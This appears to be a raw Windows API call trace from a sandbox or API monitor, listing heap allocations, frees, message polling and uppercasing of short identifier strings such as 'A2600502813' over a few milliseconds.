RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ac8 [0212.118] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782a0 [0212.118] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ad8 [0212.118] CharUpperBuffW (in: lpsz="A2600502813", cchLength=0xb | out: lpsz="A2600502813") returned 0xb [0212.118] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782a0 | out: hHeap=0x2af0000) returned 1 [0212.118] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0212.118] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0212.118] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71af8 [0212.118] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0212.118] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0212.119] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ad8 [0212.119] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b08 [0212.119] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xe4ac) returned 0x2a8a938 [0212.119] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0212.119] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71b58 [0212.119] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0212.119] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b78 [0212.119] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0212.119] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71b78 [0212.119] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa570 [0212.119] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ad8 [0212.119] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0212.119] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71ad8 [0212.119] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0212.119] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0212.119] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0212.119] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa828 [0212.119] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78340 [0212.119] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa558 [0212.119] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ae8 [0212.120] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa558 | out: hHeap=0x2af0000) returned 1 [0212.120] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78098 [0212.120] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa558 [0212.120] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b88 [0212.120] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xe4ac) returned 0x2abcd30 [0212.121] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780e8 [0212.121] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa918 [0212.121] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719b8 [0212.121] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0212.121] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780c0 [0212.121] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa918 [0212.121] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78110 [0212.121] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa68 [0212.121] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719f8 [0212.121] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa68 | out: hHeap=0x2af0000) returned 1 [0212.121] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78390 [0212.121] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa960 [0212.121] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78020 [0212.121] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa20 [0212.121] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a08 [0212.121] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa20 | out: hHeap=0x2af0000) returned 1 [0212.121] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78368 [0212.121] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa978 [0212.121] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0212.121] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.121] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d88 [0212.121] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71be8 [0212.121] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa990 [0212.122] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9f0 [0212.122] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bf8 [0212.122] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9a8 [0212.122] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bf8 | out: hHeap=0x2af0000) returned 1 [0212.122] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71bb8 [0212.122] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78318 [0212.122] CharUpperBuffW (in: lpsz="SSA2600502813", cchLength=0xd | out: lpsz="SSA2600502813") returned 0xd [0212.122] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78318 | out: hHeap=0x2af0000) returned 1 [0212.122] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bb8 | out: hHeap=0x2af0000) returned 1 [0212.122] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9a8 | out: hHeap=0x2af0000) returned 1 [0212.122] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9f0 | out: hHeap=0x2af0000) returned 1 [0212.122] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa990 | out: hHeap=0x2af0000) returned 1 [0212.122] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71be8 | out: hHeap=0x2af0000) returned 1 [0212.122] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d88 | out: hHeap=0x2af0000) returned 1 [0212.122] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e640 [0212.122] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.122] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e640 | out: hHeap=0x2af0000) returned 1 [0212.122] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.122] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa990 [0212.122] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d78 [0212.122] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa990 | out: hHeap=0x2af0000) returned 1 [0212.122] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783b8 [0212.122] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa68 [0212.122] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa990 [0212.122] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d28 [0212.122] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783e0 [0212.123] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa858 [0212.123] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c68 [0212.123] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa858 | out: hHeap=0x2af0000) returned 1 [0212.123] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fd0 [0212.123] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8a0 [0212.123] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9a8 [0212.123] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a783b8 | out: hHeap=0x2af0000) returned 1 [0212.123] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d78 | out: hHeap=0x2af0000) returned 1 [0212.123] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa68 | out: hHeap=0x2af0000) returned 1 [0212.123] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.123] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9c0 [0212.123] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c98 [0212.123] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9c0 | out: hHeap=0x2af0000) returned 1 [0212.123] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78200 [0212.123] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9c0 [0212.123] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9f0 [0212.123] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c08 [0212.123] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ff8 [0212.123] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa858 [0212.123] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d08 [0212.123] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa858 | out: hHeap=0x2af0000) returned 1 [0212.123] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78250 [0212.123] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa20 [0212.123] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa68 [0212.123] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78200 | out: hHeap=0x2af0000) returned 1 [0212.123] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c98 | out: hHeap=0x2af0000) returned 1 [0212.123] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9c0 | out: hHeap=0x2af0000) returned 1 [0212.123] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.124] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9c0 | out: hHeap=0x2af0000) returned 1 [0212.124] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9c0 | out: hHeap=0x2af0000) returned 1 [0212.124] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782a0 | out: hHeap=0x2af0000) returned 1 [0212.124] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c38 | out: hHeap=0x2af0000) returned 1 [0212.124] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa80 | out: hHeap=0x2af0000) returned 1 [0212.124] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.124] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa80 | out: hHeap=0x2af0000) returned 1 [0212.124] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaee8 | out: hHeap=0x2af0000) returned 1 [0212.124] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78458 | out: hHeap=0x2af0000) returned 1 [0212.124] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c18 | out: hHeap=0x2af0000) returned 1 [0212.124] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa80 | out: hHeap=0x2af0000) returned 1 [0212.124] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.124] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa80 | out: hHeap=0x2af0000) returned 1 [0212.124] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaee8 | out: hHeap=0x2af0000) returned 1 [0212.124] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78048 | out: hHeap=0x2af0000) returned 1 [0212.124] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d88 | out: hHeap=0x2af0000) returned 1 [0212.124] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa80 | out: hHeap=0x2af0000) returned 1 [0212.124] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.124] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0212.124] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a783b8 | out: hHeap=0x2af0000) returned 1 [0212.124] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c38 | out: hHeap=0x2af0000) returned 1 [0212.124] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0212.124] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cd8 | out: hHeap=0x2af0000) returned 1 [0212.124] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0212.124] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a783b8 | out: hHeap=0x2af0000) returned 1 [0212.125] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d58 | out: hHeap=0x2af0000) returned 1 [0212.125] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae88 | out: hHeap=0x2af0000) returned 1 [0212.125] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaed0 | out: hHeap=0x2af0000) returned 1 [0212.125] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab068 | out: hHeap=0x2af0000) returned 1 [0212.125] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c28 | out: hHeap=0x2af0000) returned 1 [0212.125] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c18 | out: hHeap=0x2af0000) returned 1 [0212.125] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0212.125] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ecc0 | out: hHeap=0x2af0000) returned 1 [0212.125] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0212.125] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0212.125] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a781b0 | out: hHeap=0x2af0000) returned 1 [0212.125] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bc8 | out: hHeap=0x2af0000) returned 1 [0212.125] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0212.125] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cd8 | out: hHeap=0x2af0000) returned 1 [0212.125] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0212.125] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a783b8 | out: hHeap=0x2af0000) returned 1 [0212.125] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ce8 | out: hHeap=0x2af0000) returned 1 [0212.125] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab080 | out: hHeap=0x2af0000) returned 1 [0212.125] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaed0 | out: hHeap=0x2af0000) returned 1 [0212.125] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab068 | out: hHeap=0x2af0000) returned 1 [0212.125] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c28 | out: hHeap=0x2af0000) returned 1 [0212.125] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bc8 | out: hHeap=0x2af0000) returned 1 [0212.125] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0212.125] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ebc0 | out: hHeap=0x2af0000) returned 1 [0212.125] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0212.125] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d18 | out: hHeap=0x2af0000) returned 1 [0212.125] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab068 | out: hHeap=0x2af0000) returned 1 [0212.125] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaee8 | out: hHeap=0x2af0000) returned 1 [0212.126] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0e0 | out: hHeap=0x2af0000) returned 1 [0212.126] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d88 | out: hHeap=0x2af0000) returned 1 [0212.126] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cc8 | out: hHeap=0x2af0000) returned 1 [0212.126] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x38544b8 | out: hHeap=0x2af0000) returned 1 [0212.126] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0f8 | out: hHeap=0x2af0000) returned 1 [0212.126] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cb8 | out: hHeap=0x2af0000) returned 1 [0212.126] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab098 | out: hHeap=0x2af0000) returned 1 [0212.126] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf30 | out: hHeap=0x2af0000) returned 1 [0212.126] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab068 | out: hHeap=0x2af0000) returned 1 [0212.126] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6fe0 | out: hHeap=0x2af0000) returned 1 [0212.126] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d78 | out: hHeap=0x2af0000) returned 1 [0212.126] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ca8 | out: hHeap=0x2af0000) returned 1 [0212.126] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0212.126] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e9c0 | out: hHeap=0x2af0000) returned 1 [0212.126] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0212.126] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0212.126] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78278 | out: hHeap=0x2af0000) returned 1 [0212.126] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ce8 | out: hHeap=0x2af0000) returned 1 [0212.126] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0212.126] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c38 | out: hHeap=0x2af0000) returned 1 [0212.126] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0212.126] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782f0 | out: hHeap=0x2af0000) returned 1 [0212.126] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cf8 | out: hHeap=0x2af0000) returned 1 [0212.126] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab098 | out: hHeap=0x2af0000) returned 1 [0212.126] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab080 | out: hHeap=0x2af0000) returned 1 [0212.126] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab068 | out: hHeap=0x2af0000) returned 1 [0212.126] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c28 | out: hHeap=0x2af0000) returned 1 [0212.126] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c78 | out: hHeap=0x2af0000) returned 1 [0212.127] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0212.127] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e880 | out: hHeap=0x2af0000) returned 1 [0212.127] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0212.127] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cb8 | out: hHeap=0x2af0000) returned 1 [0212.127] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf30 | out: hHeap=0x2af0000) returned 1 [0212.127] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab080 | out: hHeap=0x2af0000) returned 1 [0212.127] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae70 | out: hHeap=0x2af0000) returned 1 [0212.127] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ca8 | out: hHeap=0x2af0000) returned 1 [0212.127] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cd8 | out: hHeap=0x2af0000) returned 1 [0212.127] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab080 | out: hHeap=0x2af0000) returned 1 [0212.127] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaed0 | out: hHeap=0x2af0000) returned 1 [0212.127] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab068 | out: hHeap=0x2af0000) returned 1 [0212.127] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bc8 | out: hHeap=0x2af0000) returned 1 [0212.127] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0212.127] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x38546b0 | out: hHeap=0x2af0000) returned 1 [0212.127] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0212.127] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0212.127] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ca8 | out: hHeap=0x2af0000) returned 1 [0212.127] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0212.127] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa80 | out: hHeap=0x2af0000) returned 1 [0212.127] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.127] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.127] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7060 | out: hHeap=0x2af0000) returned 1 [0212.127] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bc8 | out: hHeap=0x2af0000) returned 1 [0212.127] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c28 | out: hHeap=0x2af0000) returned 1 [0212.127] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 